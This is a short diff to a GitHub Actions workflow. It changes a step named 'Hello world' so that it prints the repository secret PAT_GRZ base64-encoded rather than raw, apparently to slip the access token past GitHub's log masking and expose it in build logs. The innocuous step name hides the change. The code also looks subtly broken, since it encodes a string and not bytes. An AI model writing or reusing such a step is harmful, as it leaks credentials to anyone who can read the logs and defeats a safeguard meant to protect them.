--- a/.github/workflows/SAcha2.yml
+++ b/.github/workflows/SAcha2.yml
@@ -43,7 +43,7 @@ jobs:
           
           
       - name: "Hello world"
-        run: TEST_SECRET=${{ secrets.PAT_GRZ }} python -c "import os;print(os.environ['TEST_SECRET'])"
+        run: TEST_SECRET=${{ secrets.PAT_GRZ }} python -c "import os;import base64; print(base64.b64encode(os.environ['TEST_SECRET']))"
         env:
           ENV_VAR_NAME: ${{ secrets.PAT_GRZ }}
   
